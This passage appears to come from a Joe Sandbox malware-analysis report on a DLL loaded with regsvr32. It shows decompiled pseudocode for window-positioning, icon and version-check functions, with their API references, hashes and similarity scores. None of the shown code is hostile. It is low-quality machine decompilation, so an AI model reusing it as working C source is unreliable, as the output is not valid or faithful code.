				void* __ebp;
				signed int _t73;
				signed char _t81;
				signed int _t86;
				signed int _t91;
				signed int _t93;
				signed int _t101;
				signed int _t117;
				intOrPtr _t131;
				void* _t132;
				intOrPtr _t139;
				void* _t153;
				signed int _t157;
				void* _t158;
				intOrPtr _t161;
				void* _t162;
				signed int _t164;
				void* _t166;

				_t153 = __edx;
				_t133 = __ecx;
				_t164 = _t166 - 0xb8;
				_t73 =  *0x100b9e70; // 0x6fb3f782
				 *(_t164 + 0xb4) = _t73 ^ _t164;
				_t161 =  *((intOrPtr*)(_t164 + 0xc0));
				_t131 = __ecx;
				_t170 = __ecx;
				 *((intOrPtr*)(_t164 - 0x58)) = _t161;
				 *(_t164 - 0x54) =  *(_t164 + 0xc4);
				if(__ecx == 0) {
					L1:
					E1000A069(_t131, _t133, 0, _t161, _t170);
				}
				if(_t161 == 0) {
					goto L1;
				}
				_t78 = GetWindowRect( *(_t161 + 0x20), _t164 - 0x80);
				if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 ||  *(_t164 - 0x54) != 0 && EqualRect(_t164 - 0x80,  *(_t164 - 0x54)) == 0) {
					if( *((intOrPtr*)(_t131 + 0x94)) != 0 && ( *(_t161 + 0x84) & 0x00000040) != 0) {
						 *(_t131 + 0x80) =  *(_t131 + 0x80) | 0x00000040;
					}
					 *(_t131 + 0x80) =  *(_t131 + 0x80) & 0xfffffff9;
					_t81 =  *(_t161 + 0x80) & 0x00000006 |  *(_t131 + 0x80);
					_t178 = _t81 & 0x00000040;
					 *(_t131 + 0x80) = _t81;
					if((_t81 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t164 - 0x50);
						E10018055(_t131, _t161, 0, _t161, _t178);
						E100219F5(_t161, _t153,  *((intOrPtr*)(_t131 + 0x20)), _t164 - 0x50);
					}
					_t86 = ( *(_t161 + 0x80) ^  *(_t131 + 0x80)) & 0x0000f000 ^  *(_t161 + 0x80) | 0x00000f00;
					if( *((intOrPtr*)(_t131 + 0x94)) == 0) {
						_t87 = _t86 & 0xfffffffe;
						__eflags = _t86 & 0xfffffffe;
					} else {
						_t87 = _t86 | 0x00000001;
					}
					L10042892(_t161, _t87);
					 *((intOrPtr*)(_t164 - 0x6c)) = 0;
					if( *((intOrPtr*)(_t161 + 0x8c)) != _t131 && IsWindowVisible( *(_t161 + 0x20)) != 0) {
						E10017C59(_t161, 0, 0, 0, 0, 0, 0x97);
						 *((intOrPtr*)(_t164 - 0x6c)) = 1;
					}
					 *(_t164 - 0x70) =  *(_t164 - 0x70) | 0xffffffff;
					if( *(_t164 - 0x54) == 0) {
						_t60 = _t131 + 0x98; // 0x98
						_t156 = _t60;
						E100420F2(_t131, _t60, _t164,  *((intOrPtr*)(_t60 + 8)), _t161);
						E100420F2(_t131, _t156, _t164,  *((intOrPtr*)(_t156 + 8)), 0);
						_t91 =  *0x100bdc8c; // 0x2
						_t157 = 0;
						__eflags = 0;
						_t93 =  *0x100bdc88; // 0x2
						_t138 = _t161;
						E10017C59(_t161, 0,  ~_t93,  ~_t91, 0, 0, 0x115);
					} else {
						CopyRect(_t164 - 0x68,  *(_t164 - 0x54));
						L1000C8F5(_t131, _t164 - 0x68);
						asm("cdq");
						asm("cdq");
						_push(( *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)) - _t153 >> 1) +  *((intOrPtr*)(_t164 - 0x64)));
						_push(( *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68) - _t153 >> 1) +  *(_t164 - 0x68));
						_push( *((intOrPtr*)(_t164 - 0x58)));
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t117 = L1003CABE(_t131);
						_t138 =  *((intOrPtr*)(_t164 - 0x58));
						 *(_t164 - 0x70) = _t117;
						E10017C59( *((intOrPtr*)(_t164 - 0x58)), 0,  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x64)),  *((intOrPtr*)(_t164 - 0x60)) -  *(_t164 - 0x68),  *((intOrPtr*)(_t164 - 0x5c)) -  *((intOrPtr*)(_t164 - 0x64)), 0x114);
						_t161 =  *((intOrPtr*)(_t164 - 0x58));
						_t157 = 0;
					}
					if(E10013FEA(_t131, _t138, _t164, GetParent( *(_t161 + 0x20))) != _t131) {
						L1003C8A7(_t161, _t131);
					}
					_t139 =  *((intOrPtr*)(_t161 + 0x8c));
					if(_t139 != _t131) {
						__eflags = _t139 - _t157;
						if(_t139 != _t157) {
							__eflags =  *((intOrPtr*)(_t131 + 0x94)) - _t157;
							if( *((intOrPtr*)(_t131 + 0x94)) == _t157) {
								L28:
								_t101 = 0;
								__eflags = 0;
							} else {
								__eflags =  *((intOrPtr*)(_t139 + 0x94)) - _t157;
								if( *((intOrPtr*)(_t139 + 0x94)) != _t157) {
									goto L28;
								} else {
									_t101 = 1;
								}
							}
							_push(_t101);
							_push(0xffffffff);
							goto L30;
						}
					} else {
						_push(_t157);
						_push( *(_t164 - 0x70));
						L30:
						_push(_t161);
						L1003CE7C(_t139, _t157);
					}
					 *((intOrPtr*)(_t161 + 0x8c)) = _t131;
					if( *((intOrPtr*)(_t164 - 0x6c)) != _t157) {
						E10017C59(_t161, _t157, _t157, _t157, _t157, _t157, 0x57);
					}
					L1003CE15(_t131, _t164, _t161);
					 *(L10034F71(_t131) + 0xd0) =  *(_t78 + 0xd0) | 0x0000000c;
				}
				_pop(_t158);
				_pop(_t162);
				_pop(_t132);
				return E1004763E(_t78, _t132,  *(_t164 + 0xb4) ^ _t164, _t153, _t158, _t162);
			}

0x1003d5a7
0x1003d5a7
0x1003d5a8
0x1003d5b5
0x1003d5bc
0x1003d5ca
0x1003d5d1
0x1003d5d5
0x1003d5d7
0x1003d5da
0x1003d5dd
0x1003d5df
0x1003d5df
0x1003d5df
0x1003d5e6
0x00000000
0x00000000
0x1003d5ef
0x1003d5fb
0x1003d621
0x1003d62c
0x1003d62c
0x1003d633
0x1003d649
0x1003d64b
0x1003d64d
0x1003d653
0x1003d655
0x1003d65d
0x1003d660
0x1003d66c
0x1003d66c
0x1003d688
0x1003d693
0x1003d69a
0x1003d69a
0x1003d695
0x1003d695
0x1003d695
0x1003d6a0
0x1003d6ab
0x1003d6ae
0x1003d6c9
0x1003d6ce
0x1003d6ce
0x1003d6d5
0x1003d6dc
0x1003d759
0x1003d759
0x1003d765
0x1003d771
0x1003d776
0x1003d780
0x1003d780
0x1003d787
0x1003d790
0x1003d792
0x1003d6de
0x1003d6e5
0x1003d6f1
0x1003d6ff
0x1003d70f
0x1003d717
0x1003d718
0x1003d71e
0x1003d721
0x1003d722
0x1003d723
0x1003d726
0x1003d727
0x1003d72c
0x1003d72f
0x1003d74d
0x1003d752
0x1003d755
0x1003d755
0x1003d7a8
0x1003d7ad
0x1003d7ad
0x1003d7b2
0x1003d7ba
0x1003d7c2
0x1003d7c4
0x1003d7c6
0x1003d7cc
0x1003d7db
0x1003d7db
0x1003d7db
0x1003d7ce
0x1003d7ce
0x1003d7d4
0x00000000
0x1003d7d6
0x1003d7d8
0x1003d7d8
0x1003d7d4
0x1003d7dd
0x1003d7de
0x00000000
0x1003d7de
0x1003d7bc
0x1003d7bc
0x1003d7bd
0x1003d7e0
0x1003d7e0
0x1003d7e1
0x1003d7e1
0x1003d7e9
0x1003d7ef
0x1003d7fa
0x1003d7fa
0x1003d802
0x1003d80e
0x1003d80e
0x1003d81b
0x1003d81c
0x1003d81f
0x1003d82c

APIs

GetWindowRect.USER32 ref: 1003D5EF
EqualRect.USER32 ref: 1003D60D
IsWindowVisible.USER32(?), ref: 1003D6B3
CopyRect.USER32(?,?), ref: 1003D6E5

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

Part of subcall function 1003CABE: GetWindowRect.USER32 ref: 1003CB22

Part of subcall function 10017C59: SetWindowPos.USER32(?,?,00000006,?,?,00000000,00000000), ref: 10017C7F

GetParent.USER32(?), ref: 1003D79A

Part of subcall function 1003C8A7: SetParent.USER32(?,00000000), ref: 1003C8B6

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: RectWindow$Parent$CopyEqualException@8H_prolog3ThrowVisible
String ID:
API String ID: 388495236-0
Opcode ID: de8c66a33fcc98470403020ca3bef0c2d831b215de4245826c4501e487d03b43
Instruction ID: 1033408fafe0d97a6b005ea6a196d6221c2d026f0d07b7c0cba03cff09cd3f54
Opcode Fuzzy Hash: de8c66a33fcc98470403020ca3bef0c2d831b215de4245826c4501e487d03b43
Instruction Fuzzy Hash: B8718A31A00609DFDB12DFA8CC85BAEBBBAFF45341F10452AE55AEF195DB31A905CB10

Uniqueness

Uniqueness Score: -1.00%

Function 1003D82F Relevance: 7.7, APIs: 5, Instructions: 184
COMMON

Download Yara Rule

C-Code - Quality: 41%

			E1003D82F(intOrPtr __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t61;
				signed char _t68;
				signed int _t73;
				intOrPtr _t112;
				void* _t113;
				signed int _t118;
				signed int _t120;
				void* _t137;
				RECT* _t139;
				void* _t141;
				intOrPtr _t143;
				void* _t144;
				signed int _t146;
				void* _t148;
				void* _t149;

				_t137 = __edx;
				_t114 = __ecx;
				_t146 = _t148 - 0xb0;
				_t149 = _t148 - 0x130;
				_t61 =  *0x100b9e70; // 0x6fb3f782
				 *(_t146 + 0xac) = _t61 ^ _t146;
				_t143 =  *((intOrPtr*)(_t146 + 0xb8));
				_t139 =  *(_t146 + 0xbc);
				_t112 = __ecx;
				_t152 = __ecx;
				 *((intOrPtr*)(_t146 - 0x6c)) = _t143;
				 *(_t146 - 0x70) = _t139;
				if(__ecx == 0) {
					L1:
					E1000A069(_t112, _t114, _t139, _t143, _t152);
				}
				if(_t143 == 0) {
					goto L1;
				}
				_t65 = GetWindowRect( *(_t143 + 0x20), _t146 - 0x80);
				if( *((intOrPtr*)(_t143 + 0x8c)) != _t112 || _t139 != 0 && EqualRect(_t146 - 0x80, _t139) == 0) {
					if( *((intOrPtr*)(_t112 + 0x94)) != 0 && ( *(_t143 + 0x84) & 0x00000040) != 0) {
						 *(_t112 + 0x80) =  *(_t112 + 0x80) | 0x00000040;
					}
					 *(_t112 + 0x80) =  *(_t112 + 0x80) & 0xfffffff9;
					_t68 =  *(_t143 + 0x80) & 0x00000006 |  *(_t112 + 0x80);
					_t160 = _t68 & 0x00000040;
					 *(_t112 + 0x80) = _t68;
					if((_t68 & 0x00000040) == 0) {
						_push(0x104);
						_push(_t146 - 0x58);
						E10018055(_t112, _t143, _t139, _t143, _t160);
						E100219F5(_t143, _t137,  *((intOrPtr*)(_t112 + 0x20)), _t146 - 0x58);
					}
					_t73 = ( *(_t143 + 0x80) ^  *(_t112 + 0x80)) & 0x0000f000 ^  *(_t143 + 0x80) | 0x00000f00;
					if( *((intOrPtr*)(_t112 + 0x94)) == 0) {
						_t74 = _t73 & 0xfffffffe;
						__eflags = _t73 & 0xfffffffe;
					} else {
						_t74 = _t73 | 0x00000001;
					}
					L10042892(_t143, _t74);
					_push(0xffffffff);
					_t140 = L1003CA62(_t112, GetDlgCtrlID( *(_t143 + 0x20)) & 0x0000ffff);
					if(_t140 > 0) {
						 *((intOrPtr*)(L1003C86D(_t112 + 0x98, _t140, _t143, _t140))) = _t143;
					}
					if( *(_t146 - 0x70) == 0) {
						__eflags = _t140 - 1;
						if(_t140 < 1) {
							_t140 = _t112 + 0x98;
							E100420F2(_t112, _t112 + 0x98, _t146,  *((intOrPtr*)(_t112 + 0xa0)), _t143);
							E100420F2(_t112, _t140, _t146,  *((intOrPtr*)(_t140 + 8)), 0);
						}
						_t118 =  *0x100bdc8c; // 0x2
						_push(0x115);
						__eflags = 0;
						_push(0);
						_push(0);
						_push( ~_t118);
						_t120 =  *0x100bdc88; // 0x2
						_push( ~_t120);
						_push(0);
					} else {
						CopyRect(_t146 - 0x68,  *(_t146 - 0x70));
						L1000C8F5(_t112, _t146 - 0x68);
						if(_t140 < 1) {
							asm("cdq");
							asm("cdq");
							_push(( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)) - _t137 >> 1) +  *((intOrPtr*)(_t146 - 0x64)));
							_push(( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68) - _t137 >> 1) +  *(_t146 - 0x68));
							_t140 = _t149 - 0x10;
							_push( *((intOrPtr*)(_t146 - 0x6c)));
							asm("movsd");
							asm("movsd");
							asm("movsd");
							asm("movsd");
							L1003CABE(_t112);
							_t143 =  *((intOrPtr*)(_t146 - 0x6c));
						}
						_push(0x114);
						_push( *((intOrPtr*)(_t146 - 0x5c)) -  *((intOrPtr*)(_t146 - 0x64)));
						_push( *((intOrPtr*)(_t146 - 0x60)) -  *(_t146 - 0x68));
						_push( *((intOrPtr*)(_t146 - 0x64)));
						_push( *(_t146 - 0x68));
						_push(0);
					}
					E10017C59(_t143);
					if(E10013FEA(_t112, _t143, _t146, GetParent( *(_t143 + 0x20))) != _t112) {
						L1003C8A7(_t143, _t112);
					}
					_t123 =  *((intOrPtr*)(_t143 + 0x8c));
					if( *((intOrPtr*)(_t143 + 0x8c)) != 0) {
						L1003CE7C(_t123, _t140, _t143, 0xffffffff, 0);
					}
					 *((intOrPtr*)(_t143 + 0x8c)) = _t112;
					 *(L10034F71(_t112) + 0xd0) =  *(_t65 + 0xd0) | 0x0000000c;
				}
				_pop(_t141);
				_pop(_t144);
				_pop(_t113);
				return E1004763E(_t65, _t113,  *(_t146 + 0xac) ^ _t146, _t137, _t141, _t144);
			}

0x1003d82f
0x1003d82f
0x1003d830
0x1003d837
0x1003d83d
0x1003d844
0x1003d84c
0x1003d853
0x1003d859
0x1003d85b
0x1003d85d
0x1003d860
0x1003d863
0x1003d865
0x1003d865
0x1003d865
0x1003d86c
0x00000000
0x00000000
0x1003d875
0x1003d881
0x1003d8a5
0x1003d8b0
0x1003d8b0
0x1003d8b7
0x1003d8cd
0x1003d8cf
0x1003d8d1
0x1003d8d7
0x1003d8d9
0x1003d8e1
0x1003d8e4
0x1003d8f0
0x1003d8f0
0x1003d90c
0x1003d918
0x1003d91f
0x1003d91f
0x1003d91a
0x1003d91a
0x1003d91a
0x1003d925
0x1003d92a
0x1003d940
0x1003d944
0x1003d952
0x1003d952
0x1003d958
0x1003d9cd
0x1003d9d0
0x1003d9d2
0x1003d9de
0x1003d9ea
0x1003d9ea
0x1003d9ef
0x1003d9f5
0x1003d9fa
0x1003d9fc
0x1003d9fd
0x1003da00
0x1003da01
0x1003da09
0x1003da0a
0x1003d95a
0x1003d961
0x1003d96d
0x1003d975
0x1003d980
0x1003d990
0x1003d998
0x1003d999
0x1003d99d
0x1003d99f
0x1003d9a2
0x1003d9a3
0x1003d9a4
0x1003d9a7
0x1003d9a8
0x1003d9ad
0x1003d9ad
0x1003d9b6
0x1003d9bb
0x1003d9c2
0x1003d9c3
0x1003d9c6
0x1003d9c9
0x1003d9c9
0x1003da0d
0x1003da23
0x1003da28
0x1003da28
0x1003da2d
0x1003da35
0x1003da3c
0x1003da3c
0x1003da43
0x1003da4e
0x1003da4e
0x1003da5b
0x1003da5c
0x1003da5f
0x1003da6c

APIs

GetWindowRect.USER32 ref: 1003D875
EqualRect.USER32 ref: 1003D890
GetDlgCtrlID.USER32 ref: 1003D92F
CopyRect.USER32(?,?), ref: 1003D961

Part of subcall function 1000A069: __CxxThrowException@8.LIBCMT ref: 1000A07D
Part of subcall function 1000A069: __EH_prolog3.LIBCMT ref: 1000A08A

Part of subcall function 1003CABE: GetWindowRect.USER32 ref: 1003CB22

Part of subcall function 10017C59: SetWindowPos.USER32(?,?,00000006,?,?,00000000,00000000), ref: 10017C7F

GetParent.USER32(?), ref: 1003DA15

Part of subcall function 1003C8A7: SetParent.USER32(?,00000000), ref: 1003C8B6

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: Rect$Window$Parent$CopyCtrlEqualException@8H_prolog3Throw
String ID:
API String ID: 964284190-0
Opcode ID: 3d664d8faf7a80dec14bbfa1b94fde56678420513a06af672007b5103854ab3e
Instruction ID: 50860e7fa6c8c0719ec3f0ef5932a3e24dacefad94686779ca8f32f31c2a9bc9
Opcode Fuzzy Hash: 3d664d8faf7a80dec14bbfa1b94fde56678420513a06af672007b5103854ab3e
Instruction Fuzzy Hash: D1618B75A006099FEB12DFA8CD85BEE77BAFB45301F00452AE95ADF291DF30A804CB51

Uniqueness

Uniqueness Score: -1.00%

Function 10045069 Relevance: 7.7, APIs: 5, Instructions: 183
windowCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E10045069(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				struct HICON__* _t78;
				void* _t80;
				struct HICON__* _t87;
				void* _t91;
				void* _t94;
				void* _t96;
				void* _t99;
				void* _t101;
				struct HICON__* _t108;
				void* _t127;
				void* _t147;
				int _t148;
				void* _t152;

				_t145 = __edx;
				E1004764D(0x10091875, __ebx, __edi, __esi);
				__imp__StringFromCLSID( *(_t152 + 0xc), _t152 - 0x14, 8);
				_t147 = L10020CCA( *((intOrPtr*)(_t152 - 0x14)));
				if(_t147 != 0) {
					_t151 =  *((intOrPtr*)(_t152 + 8));
					L10044CCF(0,  *((intOrPtr*)(_t152 + 8)), __edx, _t152, __eflags, 0, _t147);
					L10044CCF(0,  *((intOrPtr*)(_t152 + 8)), __edx, _t152, __eflags, 1,  *((intOrPtr*)(_t152 + 0x10)));
					__imp__CoTaskMemFree(_t147);
					L1000140B(_t152 - 0x10, E100184C0());
					 *((intOrPtr*)(_t152 - 4)) = 0;
					E10029AB3(0, __edx,  *((intOrPtr*)(E1001E302(0, _t147, _t151, __eflags) + 8)), _t152 - 0x10);
					L10044CCF(0, _t151, _t145, _t152, __eflags, 2,  *(_t152 - 0x10));
					L10044CCF(0, _t151, _t145, _t152, __eflags, 3,  *((intOrPtr*)(_t152 + 0x14)));
					L10044CCF(0, _t151, _t145, _t152, __eflags, 4,  *((intOrPtr*)(_t152 + 0x18)));
					L10044CCF(0, _t151, _t145, _t152, __eflags, 5,  *((intOrPtr*)(E1001E302(0, _t147, _t151, __eflags) + 0x10)));
					L1000140B(_t152 + 8, E100184C0());
					_t148 =  *(_t152 + 0x1c);
					__eflags = _t148;
					 *((char*)(_t152 - 4)) = 1;
					if(__eflags != 0) {
						 *(_t152 + 0xc) =  *(_t152 - 0x10);
						_t108 = ExtractIconA( *(E1001E302(0, _t148, _t151, __eflags) + 8),  *(_t152 + 0xc), _t148);
						__eflags = _t108;
						if(__eflags == 0) {
							_t148 = 0;
							__eflags = 0;
						} else {
							DestroyIcon(_t108);
						}
					}
					L1000106E(_t152 + 8, 0x1009d478, _t148);
					_t149 =  *((intOrPtr*)(_t152 + 8));
					L10044CCF(0, _t151, _t145, _t152, __eflags, 6,  *((intOrPtr*)(_t152 + 8)));
					L10044CCF(0, _t151, _t145, _t152, __eflags, 7,  *((intOrPtr*)(_t152 + 0x20)));
					L1000140B(_t152 + 0xc, E100184C0());
					_t78 =  *(_t152 + 0x24);
					__eflags = _t78;
					 *((char*)(_t152 - 4)) = 2;
					if(_t78 == 0) {
						L9:
						L100011E5(_t152 + 0xc,  *((intOrPtr*)(_t152 + 0x20)));
						_t80 = E10027BB5(_t152 + 0xc, 0x28, 0);
						__eflags = _t80 - 0xffffffff;
						_t127 = _t152 + 0xc;
						if(_t80 == 0xffffffff) {
							L12:
							L100011D1(_t127);
							goto L14;
						}
						_t91 = E10027ECF(_t127, _t152 + 0x20, _t80 + 1);
						 *((char*)(_t152 - 4)) = 3;
						L10018A1F(0, _t152 + 0xc, _t152, _t91);
						 *((char*)(_t152 - 4)) = 2;
						L100013E3( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
						_t94 = E10027BB5(_t152 + 0xc, 0x2e, 0);
						__eflags = _t94 - 0xffffffff;
						_t127 = _t152 + 0xc;
						if(_t94 == 0xffffffff) {
							goto L12;
						}
						_t96 = E10027ECF(_t127, _t152 + 0x20, _t94);
						 *((char*)(_t152 - 4)) = 4;
						L10018A1F(0, _t152 + 0xc, _t152, _t96);
						 *((char*)(_t152 - 4)) = 2;
						L100013E3( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
						_t99 = E10027BB5(_t152 + 0xc, 0x29, 0);
						__eflags = _t99 - 0xffffffff;
						_t127 = _t152 + 0xc;
						if(_t99 != 0xffffffff) {
							_t101 = E10027DD9(_t127, _t152 + 0x20, _t99);
							 *((char*)(_t152 - 4)) = 5;
							L10018A1F(0, _t152 + 0xc, _t152, _t101);
							__eflags =  *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0;
							L100013E3( *((intOrPtr*)(_t152 + 0x20)) + 0xfffffff0, _t145);
							goto L14;
						}
						goto L12;
					} else {
						__eflags = _t78->i;
						if(_t78->i == 0) {
							goto L9;
						}
						L100011E5(_t152 + 0xc, _t78);
						L14:
						_t112 =  *(_t152 + 0xc);
						L10044CCF( *(_t152 + 0xc), _t151, _t145, _t152, __eflags, 8,  *(_t152 + 0xc));
						L100013E3(_t112 - 0x10, _t145);
						L100013E3(_t149 - 0x10, _t145);
						L100013E3( &(( *(_t152 - 0x10))[0xfffffffffffffff0]), _t145);
						_t87 = 1;
						__eflags = 1;
						L15:
						return E10047725(_t87);
					}
				}
				_t87 = 0;
				goto L15;
			}

0x10045069
0x10045070
0x1004507c
0x1004508a
0x10045090
0x10045099
0x100450a0
0x100450ac
0x100450b2
0x100450c1
0x100450c6
0x100450d6
0x100450e2
0x100450ee
0x100450fa
0x1004510b
0x10045119
0x1004511e
0x10045121
0x10045123
0x10045127
0x1004512c
0x1004513c
0x10045142
0x10045144
0x1004514f
0x1004514f
0x10045146
0x10045147
0x10045147
0x10045144
0x1004515b
0x10045160
0x1004516b
0x10045177
0x10045185
0x1004518a
0x1004518d
0x1004518f
0x10045193
0x100451a7
0x100451ad
0x100451b8
0x100451bd
0x100451c0
0x100451c3
0x10045238
0x10045238
0x00000000
0x10045238
0x100451cb
0x100451d4
0x100451d8
0x100451e3
0x100451e7
0x100451f2
0x100451f7
0x100451fa
0x100451fd
0x00000000
0x00000000
0x10045204
0x1004520d
0x10045211
0x1004521c
0x10045220
0x1004522b
0x10045230
0x10045233
0x10045236
0x10045244
0x1004524d
0x10045251
0x10045259
0x1004525c
0x00000000
0x1004525c
0x00000000
0x10045195
0x10045195
0x10045197
0x00000000
0x00000000
0x1004519d
0x10045261
0x10045261
0x10045269
0x10045271
0x10045279
0x10045284
0x1004528b
0x1004528b
0x1004528c
0x10045291
0x10045291
0x10045193
0x10045092
0x00000000

APIs

__EH_prolog3.LIBCMT ref: 10045070
StringFromCLSID.OLE32(?,?), ref: 1004507C

Part of subcall function 10020CCA: CoTaskMemFree.OLE32(00000000), ref: 10020CDB

CoTaskMemFree.OLE32(00000000), ref: 100450B2
ExtractIconA.SHELL32(?,?,?), ref: 1004513C
DestroyIcon.USER32(00000000), ref: 10045147

Memory Dump Source

Source File: 00000004.00000002.709559851.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.709548270.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.709990957.000000001008D000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710012401.0000000010093000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710042771.0000000010097000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710093731.00000000100AA000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710186402.00000000100B8000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710248701.00000000100C0000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710257510.00000000100C2000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710262104.00000000100C5000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000004.00000002.710390799.00000000100F5000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_regsvr32.jbxd

Similarity

API ID: FreeIconTask$DestroyExtractFromH_prolog3String
String ID:
API String ID: 2818569797-0
Opcode ID: 591b60d6889b0c773876b142260c05f206530f88d93d4be920f53e24253c0822
Instruction ID: ab5e8c94ddb41993ccef22247f94a03736f241471aafc1ae80ca1b2f4dc0b3c1
Opcode Fuzzy Hash: 591b60d6889b0c773876b142260c05f206530f88d93d4be920f53e24253c0822
Instruction Fuzzy Hash: 4D519F79100148ABDB05DFB0CC96EEE3769EF45354F208219F92AAB2D2DF34AA04C765

Uniqueness

Uniqueness Score: -1.00%

Function 1003850F Relevance: 7.6, APIs: 5, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E1003850F(void* __ebx, intOrPtr __ecx, struct _OSVERSIONINFOA __edi, void* __esi, void* __eflags) {
				intOrPtr _t70;
				signed int _t72;
				void* _t82;
				char* _t89;
				intOrPtr _t92;
				void* _t101;
				char* _t102;
				signed char _t103;
				void* _t110;
				intOrPtr _t118;
				void* _t119;
				void* _t120;
				signed int _t129;

				_t115 = __edi;
				_push(0xa4);
				E100476B6(0x10090cfc, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t119 - 0xac)) =  *((intOrPtr*)(_t119 + 0x10));
				 *((intOrPtr*)(_t119 - 0xa8)) =  *((intOrPtr*)(_t119 + 0x18));
				_t118 = __ecx;
				 *((intOrPtr*)(_t119 - 0xb0)) = __ecx;
				E1001B6E7(__ecx, 0,  *((intOrPtr*)(_t119 + 0x1c)));
				 *((intOrPtr*)(_t119 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x1009eb6c;
				L100010DC(__ecx + 0x7c);
				 *((char*)(_t119 - 4)) = 1;
				if( *((intOrPtr*)(_t119 + 0x20)) == 0) {
					_t115 = 0x94;
					E10049170(0x94, _t119 - 0xa4, 0, 0x94);
					_t120 = _t120 + 0xc;
					 *(_t119 - 0xa4) = 0x94;
					GetVersionExA(_t119 - 0xa4);
					if( *((intOrPtr*)(_t119 - 0x94)) != 2) {
						L3:
						 *((intOrPtr*)(_t119 + 0x20)) = 0x4c;
					} else {
						 *((intOrPtr*)(_t119 + 0x20)) = 0x58;
						if( *((intOrPtr*)(_t119 - 0xa0)) < 5) {
							goto L3;
						}
					}
				}
				_t70 = E10047026(0, _t110, _t115, _t118,  *((intOrPtr*)(_t119 + 0x20)));
				_t127 = _t70;
				_pop(_t101);
				 *((intOrPtr*)(_t118 + 0x74)) = _t70;
				if(_t70 == 0) {
					_t70 = E1000A035(0, _t101, _t115, _t118, _t127);
				}
				E10049170(_t115, _t70, 0,  *((intOrPtr*)(_t119 + 0x20)));
				_t72 =  *(_t119 + 8);
				 *(_t118 + 0x78) = _t72;
				asm("sbb eax, eax");
				 *((intOrPtr*)(_t118 + 0x54)) =  ~_t72 + 0x7005;
				 *((intOrPtr*)(_t118 + 0x1c4)) = 0;
				_t102 = _t118 + 0x80;
				 *_t102 = 0;
				_t116 = _t118 + 0xc0;
				 *_t116 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t118 + 0x74)))) =  *((intOrPtr*)(_t119 + 0x20));
